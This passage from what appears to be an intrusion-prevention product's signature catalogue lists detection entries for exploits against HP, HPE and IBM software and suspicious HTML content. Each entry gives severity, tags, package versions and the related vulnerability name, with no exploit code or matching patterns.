First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure
Description:
Back to top

File-Text_HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Easy Printer Care detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP Easy Printer Care Software, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-576-5211
Vulnerability: HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal
Description:
Back to top

File-Text_HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Easy Printer Care Software detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Easy Printer Care Software, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal
Description:
Back to top

File-Text_HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ActiveX control distributed with HP products detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, x86, HP All-in-One Series, HP Photo & Imaging Gallery, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Microsoft-Windows-MFC-Library-FileFind-Class-Heap-Overflow
Description:
Back to top

File-Text_HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal

About this situation: An attempt to exploit path traversal vulnerability in HP Info Center
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP Info Center, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
Description:
Back to top

File-Text_HP-Info-Center-ActiveX-Control-Registry-Access

About this situation: An attempt to access registry using vulnerability in Hewlett-Packard Info Center was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP Info Center, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HP-Info-Center-ActiveX-Control-Registry-Set
HP-Info-Center-ActiveX-Control-Registry-Get
Description:
Back to top

File-Text_HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods

About this situation: An attempt to use vulnerable ActiveX control methods in HP Info Center was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Info Center, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods
Description:
Back to top

File-Text_HP-Load-Runner-Directory-Traversal

About this situation: An attempt to exploit an HP Load Runner Directory Traversal vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2009, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: HP-Load-Runner-Directory-Traversal
Description:
Back to top

File-Text_HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2015, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow
Description:
Back to top

File-Text_HP-LoadRunner-Lrfileioservice-ActiveX-Input-Validation-Error

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2013, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: HP-LoadRunner-Lrfileioservice-ActiveX-Control-Input-Validation-Error
Description:
Back to top

File-Text_HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2013, Any Operating System not specific, HP LoadRunner not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

File-Text_HP-LoadRunner-Writefilestring-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2013, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: HP-LoadRunner-Writefilestring-Directory-Traversal
Description:
Back to top

File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP LoadRunner, Windows not specific, HP LoadRunner not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download
Description:
Back to top

File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, HP LoadRunner, CVE2007, Windows not specific, HP LoadRunner not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Mercury Quality Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, HP Mercury Quality Control, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_HP-Photo-Creative-Audio-ActiveX-BOF

About this situation: An attempt to exploit a vulnerability in HP Photo Creative detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP Photo Creative, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-578-5211
Vulnerability: HP-Photo-Creative-Audio-Record-ActiveX-BOF
Description:
Back to top

File-Text_HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Buffer-Overflow2

About this situation: An attempt to exploit a vulnerability in HP OLE Point of Sale (OPOS) Driver detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP OPOS Driver, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: HP-Point-Of-Sale-Opos-Driver-Oposposkeyboard.ocx-Open-Method-Buffer-Overflow
Description:
Back to top

File-Text_HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OLE Point of Sale (OPOS) Driver detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP OPOS Driver, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: HP-Point-Of-Sale-Opos-Driver-Opostoneindicator.ocx-Stack-Buffer-Overflow
Description:
Back to top

File-Text_HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in HP Software Update detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP Software Update, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: HTTP-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite

About this situation: An attempt to exploit a vulnerability in HP RulesEngine.dll ActiveX CTL detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, HP Software Update, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
Description:
Back to top

File-Text_HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in HP Sprinter detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Sprinter, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: HP-Sprinter-Tidestone-Formula-One-ActiveX-Multiple-Memory-Corruption
Description:
Back to top

File-Text_HP-VAN-SDN-Controller-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP VAN SDN Controller detected
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, HP VAN SDN Controller, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Vulnerability: HP-VAN-SDN-Controller-Command-Injection
Description:
Back to top

File-Text_HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities

About this situation: An attempt to use vulnerable ActiveX control methods in HP Virtual Rooms was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Virtual Rooms, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Text_HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection-CVE-2024-11622

About this situation: An attempt to exploit a vulnerability in HPE Insight Remote Support detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Insight Remote Support, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1849-5242
Last changed: sgpkg-ips-1849-5242
Vulnerability: HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection
Description:
Back to top

File-Text_HPE-Intelligent-Management-Center-Saveselecteddevices-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HPE iMC PLAT detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iMC PLAT, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: HPE-IMC-Saveselecteddevices-Expression-Language-Injection
Description:
Back to top

File-Text_HTML-Body-OffsetTop

About this situation: Detected document.body.offsetTop
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Body-Onload-runTest

About this situation: Detected body onload runTest
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Empty-Input-Tag

About this situation: HTML Input tag with no parameters detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: HTML-Empty-Input-Tag
Description:
Back to top

File-Text_HTML-Form-Pointed-To-Localhost

About this situation: A HTML form with action argument pointing to localhost
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Form-Pointed-To-Localhost
Description:
Back to top

File-Text_HTML-Malicious-Looking-Scripts-Within-Web-Page

About this situation: Detected Malicious Web Page
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Malicious-Looking-Web-Page

About this situation: Detected Malicious Web Page
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Null-Character-Evasion-Method

About this situation: Detected an evasion attempt
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTML-Null-Character-Evasion-Method
Description:
Back to top

File-Text_HTML-Possible-Mahdi-Traffic

About this situation: Possible Mahdi traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Mahdi
Description:
Back to top

File-Text_HTML-Suspicious-Content

About this situation: Detected suspicious content
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Description:
Back to top

File-Text_HTML-Suspicious-Function-Name

About this situation: Detected suspicious function name
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: JavaScript-Suspicious-Function-Name
Description:
Back to top

File-Text_HTML-Suspicious-Function-Name-2

About this situation: Detected suspicious function name
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Description:
Back to top

File-Text_HTML-Suspicious-Function-Name-3

About this situation: Detected suspicious function name
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Description:
Back to top

File-Text_HTML-Suspicious-Length-In-Script

About this situation: Detected Suspicious Parameter Length In Script
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Suspicious-Onload

About this situation: Detected suspicious body onload
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Suspicious-Webkit

About this situation: Detected suspicious parameter
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Description:
Back to top

File-Text_HTML-Tag-Detector

About this situation: Detects HTML tags and sets a variable
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1833-5242
Vulnerability: HTML-Tag-Detector
Description:
Back to top

File-Text_HTTP-Equiv-Etag-Parameter

About this situation: Etag HTTP header inside HTML content detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Description:
Back to top

File-Text_HTTP-Headers-Continued-After-White-Spaces

About this situation: A potential attempt to evade inspection detected
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description:
Back to top

File-Text_HTTP-Headers-In-Payload

About this situation: HTTP headers seen in the payload
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Description:
Back to top

File-Text_HTTP-Request-To-0.0.0.0-In-Script

About this situation: An attempt to exploit a browser security feature bypass vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Safari, Chrome, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Vulnerability: HTTP-Request-To-0.0.0.0
Description:
Back to top

File-Text_Hyleos-ChemView-Buffer-Overflow

About this situation: An attempt to exploit a Hyleos ChemView Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, Hyleos ChemView, CVE2010, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: Hyleos-ChemView-Buffer-Overflow
Description:
Back to top

File-Text_IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in IBiz EBanking Integrator detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBiz EBanking Integrator, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-583-5211
Vulnerability: IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write
Description:
Back to top

File-Text_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Access Support ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, IBM Access Support ActiveX Control, CVE2009, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-816-5242
Vulnerability: HTTP_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
Description:
Back to top

File-Text_IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986

About this situation: An attempt to exploit a vulnerability in IBM Aspera Faspex detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Aspera Faspex, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1558-5242
Last changed: sgpkg-ips-1558-5242
Vulnerability: IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986
Description:
Back to top

File-Text_IBM-iNotes-ActiveX-Control-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM iNotes detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, IBM Lotus iNotes, CVE2013, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: IBM-iNotes-ActiveX-Control-Integer-Overflow
Description:
Back to top

File-Text_IBM-Installation-Manager-IIM-URI-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM Installation Manager detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, IBM Rational Robot, IBM Rational Team Concert Standard Edition, IBM Installation Manager, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1771-5242
Vulnerability: IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
Description:
Back to top

File-Text_IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino Web Access detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Domino Web Access, Lotus Domino, CVE2007, Windows not specific, Lotus Domino not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution

About this situation: Attempt to exploit a command injection vulnerability in IBM Lotus Expeditor detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-449-4219
Vulnerability: HTTP-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
Description:
Back to top

File-Text_IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus iNotes detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus iNotes, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-552-5211
Vulnerability: IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_IBM-Lotus-Notes-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, Lotus Domino, CVE2005, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: IBM-Lotus-Notes-Cross-Site-Scripting
Description:
Back to top

File-Text_IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow

About this situation: Detected an attempt to exploit buffer overflow vulnerability in IBM Lotus Notes
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
Description:
Back to top

File-Text_IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow

About this situation: Detects IBM Lotus Notes HTML Speed Reader Long Url Buffer Overflow exploits
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2005, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Generic-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow-Vulnerability
Description:
Back to top

File-Text_IBM-Lotus-Notes-Url-Handler-Command-Execution

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-471-5211
Vulnerability: IBM-Lotus-Notes-Url-Handler-Command-Execution
Description:
Back to top

File-Text_IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Quickr detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Quickr, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-579-5211
Vulnerability: IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

File-Text_IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM Rational ClearQuest detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, IBM Rational ClearQuest, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-552-5211
Vulnerability: IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution
Description:
Back to top

File-Text_IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Blueberry BB FlashBack SDK FBRecorder detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Rational Rhapsody, Blueberry FlashBack SDK FBRecorder, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-576-5211
Vulnerability: IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities
Description:
Back to top

File-Text_IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM IBM SPSS SamplePower detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SPSS SamplePower, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-525-5211
Vulnerability: IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM IBM SPSS SamplePower detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SPSS SamplePower, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM IBM SPSS SamplePower detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SPSS SamplePower, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM IBM SPSS SamplePower detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SPSS SamplePower, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow
Description:
Back to top

File-Text_IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM IBM SPSS SamplePower detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SPSS SamplePower, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
